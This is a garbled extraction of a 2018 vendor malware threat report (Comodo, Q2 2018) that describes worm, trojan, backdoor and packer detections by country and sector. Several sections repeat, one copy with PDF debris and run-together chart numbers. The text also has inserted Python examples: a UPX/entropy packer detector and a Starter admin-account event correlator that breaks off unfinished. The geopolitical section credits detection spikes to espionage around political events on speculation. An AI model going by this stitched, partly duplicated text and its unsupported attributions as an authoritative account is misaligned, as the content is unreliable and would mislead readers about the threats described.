(The vertical axes of the two charts run from 0 to 180,000 and from 0 to 500,000 detections respectively.)
4.2.3 June 2018
[Chart: Android-targeted malware in June; vertical axis 0 to 300,000 detections]
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network; however, even a worm without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place Worms in a special category called "Strategic Threat" because of their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses the share from a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they travel between victim computers as attachments or links in email, and can also take advantage of exploits and autorun functionality to execute once they arrive.
This quarter the most common Email Worm, by far, was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files, including unauthorized copies of books and films, and hackers take advantage of this to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory-resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, which is just a few hundred bytes of code in length.
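UPX-style packing of the kind described above leaves traces a defender can screen for without unpacking anything. The Python below is an added example, not code from the report or from the UPX project: it walks a PE section table and reports two indicators that a stock or lightly modified UPX build leaves behind, UPX-named sections and a high-entropy section holding the compressed image. The 7.0 bits-per-byte threshold, the 256-byte minimum section size, the renamed-section variant and the inline PE images are all constructed assumptions for the demonstration.

```python
import math
import random
import struct

PE_SIGNATURE = b"PE\0\0"
# Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
# SizeOfOptionalHeader, Characteristics
COFF_HEADER_FMT = "<HHIIIHH"
# Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, PointerToRelocations,
# PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HEADER_FMT = "<8sIIIIIIHHI"
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER_FMT)  # 40 bytes
ENTROPY_THRESHOLD = 7.0  # assumption: bits per byte; UCL/LZ-compressed data sits close to 8.0
MIN_SECTION_BYTES = 256  # assumption: entropy of tiny sections is not meaningful


def shannon_entropy(data):
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input, 8.0 maximum)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe):
    """Walk the PE section table; return one dict per section with name, raw size and entropy."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    fields = struct.unpack_from(COFF_HEADER_FMT, pe, coff)
    num_sections, opt_header_size = fields[1], fields[5]
    table = coff + struct.calcsize(COFF_HEADER_FMT) + opt_header_size
    sections = []
    for i in range(num_sections):
        entry = struct.unpack_from(SECTION_HEADER_FMT, pe, table + i * SECTION_HEADER_SIZE)
        name, raw_size, raw_ptr = entry[0], entry[3], entry[4]
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "raw_size": raw_size,
            "entropy": round(shannon_entropy(raw), 2),
        })
    return sections


def packer_indicators(pe):
    """Collect UPX-style packing indicators; 'packed' is True when a name or entropy indicator fires."""
    secs = parse_sections(pe)
    upx_names = [s["name"] for s in secs if s["name"].upper().startswith("UPX")]
    high_entropy = [s["name"] for s in secs
                    if s["raw_size"] >= MIN_SECTION_BYTES and s["entropy"] >= ENTROPY_THRESHOLD]
    # Stock UPX leaves its first section with no data on disk; it is filled in at unpack time.
    empty_first = bool(secs) and secs[0]["raw_size"] == 0
    return {
        "sections": secs,
        "upx_section_names": upx_names,
        "high_entropy_sections": high_entropy,
        "empty_first_section": empty_first,
        "packed": bool(upx_names or high_entropy),
    }


def build_sample_pe(section_specs):
    """Construct a minimal PE image (DOS stub, COFF header, section table, raw data); test input only."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack(COFF_HEADER_FMT, 0x14C, len(section_specs), 0, 0, 0, 0, 0x102)
    data_start = e_lfanew + 4 + struct.calcsize(COFF_HEADER_FMT) + SECTION_HEADER_SIZE * len(section_specs)
    table, blobs, ptr = b"", b"", data_start
    for name, data in section_specs:
        table += struct.pack(SECTION_HEADER_FMT, name.encode().ljust(8, b"\0"),
                             len(data), 0x1000, len(data), ptr if data else 0, 0, 0, 0, 0, 0x60000020)
        blobs += data
        ptr += len(data)
    return dos + PE_SIGNATURE + coff + table + blobs


# Constructed inputs (not real samples): pseudo-random bytes stand in for UCL-compressed data.
_rng = random.Random(2018)
COMPRESSED_BLOB = bytes(_rng.randrange(256) for _ in range(4096))
PLAIN_CODE = (b"\x90" * 8 + b"\xc3") * 400  # repetitive, low-entropy stand-in for real code

SAMPLE_UPX = build_sample_pe([("UPX0", b""), ("UPX1", COMPRESSED_BLOB), (".rsrc", b"\0" * 512)])
SAMPLE_CLEAN = build_sample_pe([(".text", PLAIN_CODE), (".data", b"\0" * 1024)])
# Assumed variant: a modified build that renames its sections; only the entropy check catches it.
SAMPLE_RENAMED = build_sample_pe([(".text", b""), (".data", COMPRESSED_BLOB)])

if __name__ == "__main__":
    for label, pe in (("upx", SAMPLE_UPX), ("clean", SAMPLE_CLEAN), ("renamed", SAMPLE_RENAMED)):
        r = packer_indicators(pe)
        print(label, "packed" if r["packed"] else "not packed",
              r["upx_section_names"], r["high_entropy_sections"], r["empty_first_section"])
```

The entropy check is what survives a renamed or re-linked build; on real files, treat a hit as a reason to unpack and scan, not as a verdict on its own.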
In Q2 2018, Russia was the #1 home of malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section, let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected in not only one but multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today, the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose, either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world, but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder to detect by antivirus software. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals to hunt for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees), analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.
The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm, by far, was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za), and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or “peers”) that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a “memory resident” virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an “IM” or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans, and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem, or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom (“gb” for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK’s Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that “infects” other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction, and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a “severe” virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a “Remote Service Account”.
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
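The account-creation behaviour Microsoft attributes to Starter (a new local account that is then added to the administrators group) leaves a recognisable trace in the Windows Security log: event 4720 (user account created) followed shortly by event 4732 (member added to a security-enabled local group). The correlation logic below is an added example, not Comodo's or Microsoft's code; the event records it runs over are constructed for the demo, and the flat record layout (timestamp, event id, subject, target account, group) is an assumed simplification of what a log forwarder would deliver.

```python
"""Correlate Windows Security events that match the Starter pattern:
a local account is created (event 4720) and shortly afterwards added to
an administrators group (event 4732).  Added example; the records below
are constructed, not taken from the report."""
from datetime import datetime, timedelta

# Constructed sample records: (timestamp, event id, subject, target account, group).
# The "Remote Service Account" entries mimic the behaviour described for Starter.
SAMPLE_EVENTS = [
    ("2018-06-02 09:15:01", 4720, "CORP\\helpdesk", "jsmith", None),
    ("2018-06-02 09:15:02", 4732, "CORP\\helpdesk", "jsmith", "Remote Desktop Users"),
    ("2018-06-02 23:41:07", 4720, "WS-042\\SYSTEM", "Remote Service Account", None),
    ("2018-06-02 23:41:08", 4732, "WS-042\\SYSTEM", "Remote Service Account", "Administrators"),
    ("2018-06-03 08:00:00", 4732, "CORP\\admin1", "jdoe", "Administrators"),
]

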